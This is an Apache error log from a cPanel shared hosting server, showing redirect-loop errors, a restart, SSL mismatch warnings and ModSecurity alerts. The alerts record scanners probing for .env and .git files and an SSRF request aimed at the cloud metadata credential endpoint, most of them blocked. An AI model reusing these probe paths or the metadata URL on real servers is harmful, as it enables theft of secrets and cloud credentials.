[Mon May 11 13:20:49.196361 2026] [core:error] [pid 1254328:tid 1254338] [client 20.151.0.198:58142] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:49.196424 2026] [core:error] [pid 1254328:tid 1254338] [client 20.151.0.198:58142] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:51.145368 2026] [core:error] [pid 1254179:tid 1254198] [client 20.151.0.198:58770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:51.145409 2026] [core:error] [pid 1254179:tid 1254198] [client 20.151.0.198:58770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:53.216807 2026] [core:error] [pid 1254133:tid 1254157] [client 20.151.0.198:58162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:53.216837 2026] [core:error] [pid 1254133:tid 1254157] [client 20.151.0.198:58162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:58.026270 2026] [:error] [pid 1254212:tid 1254222] [client 46.151.178.13:50106] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Mon May 11 13:20:58.212312 2026] [core:error] [pid 1256241:tid 1256252] [client 20.151.0.198:44726] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:20:58.212345 2026] [core:error] [pid 1256241:tid 1256252] [client 20.151.0.198:44726] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:03.681075 2026] [core:error] [pid 1254328:tid 1254348] [client 20.151.0.198:44683] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:03.681114 2026] [core:error] [pid 1254328:tid 1254348] [client 20.151.0.198:44683] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:12.237769 2026] [core:error] [pid 1254242:tid 1254259] [client 20.151.0.198:45334] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:12.237792 2026] [core:error] [pid 1254242:tid 1254259] [client 20.151.0.198:45334] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:14.420510 2026] [authz_core:error] [pid 1256241:tid 1256256] [client 47.128.58.248:49138] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/ID3/error_log
[Mon May 11 13:21:14.722249 2026] [core:error] [pid 1254328:tid 1254332] [client 20.151.0.198:58761] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:14.722284 2026] [core:error] [pid 1254328:tid 1254332] [client 20.151.0.198:58761] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:17.067177 2026] [core:error] [pid 1254328:tid 1254333] [client 20.151.0.198:58775] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:17.067207 2026] [core:error] [pid 1254328:tid 1254333] [client 20.151.0.198:58775] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:21.348273 2026] [:error] [pid 1254179:tid 1254200] [client 114.119.146.40:28529] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=index&systpl=six&language=chinese
[Mon May 11 13:21:24.984427 2026] [core:error] [pid 1254133:tid 1254159] [client 20.151.0.198:41644] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:24.984555 2026] [core:error] [pid 1254133:tid 1254159] [client 20.151.0.198:41644] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:37.120558 2026] [core:error] [pid 1254179:tid 1254193] [client 20.151.0.198:58815] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:37.120598 2026] [core:error] [pid 1254179:tid 1254193] [client 20.151.0.198:58815] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:38.172642 2026] [autoindex:error] [pid 1254133:tid 1254146] [client 198.235.24.184:65010] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 13:21:39.874653 2026] [mpm_worker:notice] [pid 2415603:tid 2415603] AH00297: SIGUSR1 received.  Doing graceful restart
[Mon May 11 13:21:40.156408 2026] [cgid:error] [pid 1254133:tid 1254160] (2)No such file or directory: [client 54.163.169.168:26513] AH02833: stderr from /usr/local/cpanel/cgi-sys/ea-php74: ScriptSock /etc/apache2/run/cgid_sock.2415603 does not exist
[Mon May 11 13:21:40.185041 2026] [cgid:error] [pid 1254179:tid 1254190] (2)No such file or directory: [client 216.73.216.110:13915] AH02833: stderr from /usr/local/cpanel/cgi-sys/ea-php74: ScriptSock /etc/apache2/run/cgid_sock.2415603 does not exist
[Mon May 11 13:21:40.257284 2026] [cgid:error] [pid 1254133:tid 1254160] (2)No such file or directory: [client 54.163.169.168:26513] AH02833: stderr from /usr/local/cpanel/cgi-sys/ea-php74: ScriptSock /etc/apache2/run/cgid_sock.2415603 does not exist
[Mon May 11 13:21:40.285691 2026] [cgid:error] [pid 1254179:tid 1254190] (2)No such file or directory: [client 216.73.216.110:13915] AH02833: stderr from /usr/local/cpanel/cgi-sys/ea-php74: ScriptSock /etc/apache2/run/cgid_sock.2415603 does not exist
[Mon May 11 13:21:40.911080 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: moncampingcarenli.cyrilethediresa.fr:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 13:21:40.912382 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: moncampingcarenligne.cyrilethediresa.fr:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 13:21:40.982623 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: happy-baby-box.fr:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 13:21:40.983465 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: habilis.space:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 13:21:40.989394 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: domainedejanasse.com:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 13:21:41.005023 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: totalcloud.fr:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 13:21:41.013057 2026] [systemd:notice] [pid 2415603:tid 2415603] AH10497: SELinux is enabled; httpd running as context system_u:system_r:unconfined_service_t:s0
[Mon May 11 13:21:41.014225 2026] [mpm_worker:notice] [pid 2415603:tid 2415603] AH00292: Apache/2.4.67 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4 configured -- resuming normal operations
[Mon May 11 13:21:41.014246 2026] [core:notice] [pid 2415603:tid 2415603] AH00094: Command line: '/usr/sbin/httpd'
[Mon May 11 13:21:48.420220 2026] [core:error] [pid 1319885:tid 1319915] [client 20.151.0.198:41630] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:48.420252 2026] [core:error] [pid 1319885:tid 1319915] [client 20.151.0.198:41630] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:50.357518 2026] [log_config:warn] [pid 1254242:tid 1254268] (32)Broken pipe: [client 216.73.216.110:21138] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=cpanel.totalcloud.fr --suffix=-bytes_log
[Mon May 11 13:21:50.357601 2026] [log_config:warn] [pid 1254242:tid 1254268] (32)Broken pipe: [client 216.73.216.110:21138] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --main=apache-traffic.log --mainout=/var/log/cpanel-server-traffic/web/traffic-apache.log
[Mon May 11 13:21:50.357620 2026] [log_config:warn] [pid 1254242:tid 1254268] (32)Broken pipe: [client 216.73.216.110:21138] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=cpanel.totalcloud.fr --mainout=/etc/apache2/logs/access_log
[Mon May 11 13:21:53.110239 2026] [core:error] [pid 1319886:tid 1319917] [client 20.151.0.198:14697] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:21:53.110278 2026] [core:error] [pid 1319886:tid 1319917] [client 20.151.0.198:14697] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:03.870551 2026] [core:error] [pid 1319953:tid 1319962] [client 20.151.0.198:56408] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:03.870590 2026] [core:error] [pid 1319953:tid 1319962] [client 20.151.0.198:56408] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:08.283329 2026] [:error] [pid 1319953:tid 1319977] [client 209.97.180.8:52516] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 13:22:08.485209 2026] [log_config:warn] [pid 1254242:tid 1254251] (32)Broken pipe: [client 47.128.18.60:48362] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=cpanel.totalcloud.fr --suffix=-bytes_log
[Mon May 11 13:22:08.485359 2026] [log_config:warn] [pid 1254242:tid 1254251] (32)Broken pipe: [client 47.128.18.60:48362] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --main=apache-traffic.log --mainout=/var/log/cpanel-server-traffic/web/traffic-apache.log
[Mon May 11 13:22:08.485372 2026] [log_config:warn] [pid 1254242:tid 1254251] (32)Broken pipe: [client 47.128.18.60:48362] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=cpanel.totalcloud.fr --mainout=/etc/apache2/logs/access_log
[Mon May 11 13:22:13.721528 2026] [core:error] [pid 1319953:tid 1319960] [client 20.151.0.198:42770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:13.721671 2026] [core:error] [pid 1319953:tid 1319960] [client 20.151.0.198:42770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:17.177881 2026] [log_config:warn] [pid 1254242:tid 1254261] (32)Broken pipe: [client 34.224.9.144:60204] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=cpanel.totalcloud.fr --suffix=-bytes_log
[Mon May 11 13:22:17.177923 2026] [log_config:warn] [pid 1254242:tid 1254261] (32)Broken pipe: [client 34.224.9.144:60204] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --main=apache-traffic.log --mainout=/var/log/cpanel-server-traffic/web/traffic-apache.log
[Mon May 11 13:22:17.178024 2026] [log_config:warn] [pid 1254242:tid 1254261] (32)Broken pipe: [client 34.224.9.144:60204] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=cpanel.totalcloud.fr --mainout=/etc/apache2/logs/access_log
[Mon May 11 13:22:21.873746 2026] [security2:error] [pid 1320398:tid 1320406] [client 46.101.1.225:44924] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env"] [unique_id "agG77eJEyNRN152ArORhsAAAAEY"]
[Mon May 11 13:22:21.874065 2026] [security2:error] [pid 1320398:tid 1320406] [client 46.101.1.225:44924] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env"] [unique_id "agG77eJEyNRN152ArORhsAAAAEY"]
[Mon May 11 13:22:22.432152 2026] [core:error] [pid 1319885:tid 1319889] [client 20.151.0.198:58192] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:22.432198 2026] [core:error] [pid 1319885:tid 1319889] [client 20.151.0.198:58192] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:22.951536 2026] [security2:error] [pid 1320398:tid 1320406] [client 46.101.1.225:44924] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agG77eJEyNRN152ArORhsAAAAEY"]
[Mon May 11 13:22:23.666988 2026] [security2:error] [pid 1319886:tid 1319928] [client 209.97.180.8:33630] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.env"] [unique_id "agG776y-5-wpj6Sx56ZwVwAAABI"]
[Mon May 11 13:22:23.667230 2026] [security2:error] [pid 1319886:tid 1319928] [client 209.97.180.8:33630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.env"] [unique_id "agG776y-5-wpj6Sx56ZwVwAAABI"]
[Mon May 11 13:22:25.051651 2026] [security2:error] [pid 1319886:tid 1319928] [client 209.97.180.8:33630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agG776y-5-wpj6Sx56ZwVwAAABI"]
[Mon May 11 13:22:26.175486 2026] [security2:error] [pid 1320398:tid 1320414] [client 46.101.1.225:44942] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agG78uJEyNRN152ArORhtgAAAE4"]
[Mon May 11 13:22:26.175714 2026] [security2:error] [pid 1320398:tid 1320414] [client 46.101.1.225:44942] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agG78uJEyNRN152ArORhtgAAAE4"]
[Mon May 11 13:22:27.265862 2026] [security2:error] [pid 1320398:tid 1320414] [client 46.101.1.225:44942] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agG78uJEyNRN152ArORhtgAAAE4"]
[Mon May 11 13:22:28.232676 2026] [security2:error] [pid 1320398:tid 1320417] [client 209.97.180.8:48078] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agG79OJEyNRN152ArORhuQAAAFE"]
[Mon May 11 13:22:28.232904 2026] [security2:error] [pid 1320398:tid 1320417] [client 209.97.180.8:48078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/.git/config"] [unique_id "agG79OJEyNRN152ArORhuQAAAFE"]
[Mon May 11 13:22:28.735701 2026] [core:error] [pid 1319885:tid 1319912] [client 20.151.0.198:42815] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:28.735743 2026] [core:error] [pid 1319885:tid 1319912] [client 20.151.0.198:42815] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:29.025313 2026] [security2:error] [pid 1320398:tid 1320417] [client 209.97.180.8:48078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agG79OJEyNRN152ArORhuQAAAFE"]
[Mon May 11 13:22:37.711069 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.157:56992] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.bak"] [unique_id "agG7_at2WtvoFr7xvGysWAAAAIM"]
[Mon May 11 13:22:37.711331 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.157:56992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.bak"] [unique_id "agG7_at2WtvoFr7xvGysWAAAAIM"]
[Mon May 11 13:22:37.714261 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.157:56876] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ventes-privees-auto.fr"] [uri "/_next/image"] [unique_id "agG7_eJEyNRN152ArORhygAAAEc"]
[Mon May 11 13:22:37.714403 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.157:57030] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.git/refs/heads/main"] [unique_id "agG7_eJEyNRN152ArORhywAAAEk"]
[Mon May 11 13:22:37.714547 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.157:57030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.git/refs/heads/main"] [unique_id "agG7_eJEyNRN152ArORhywAAAEk"]
[Mon May 11 13:22:37.718816 2026] [security2:error] [pid 1320398:tid 1320406] [client 195.178.110.157:56952] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.production"] [unique_id "agG7_eJEyNRN152ArORhzAAAAEY"]
[Mon May 11 13:22:37.719040 2026] [security2:error] [pid 1320398:tid 1320406] [client 195.178.110.157:56952] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.production"] [unique_id "agG7_eJEyNRN152ArORhzAAAAEY"]
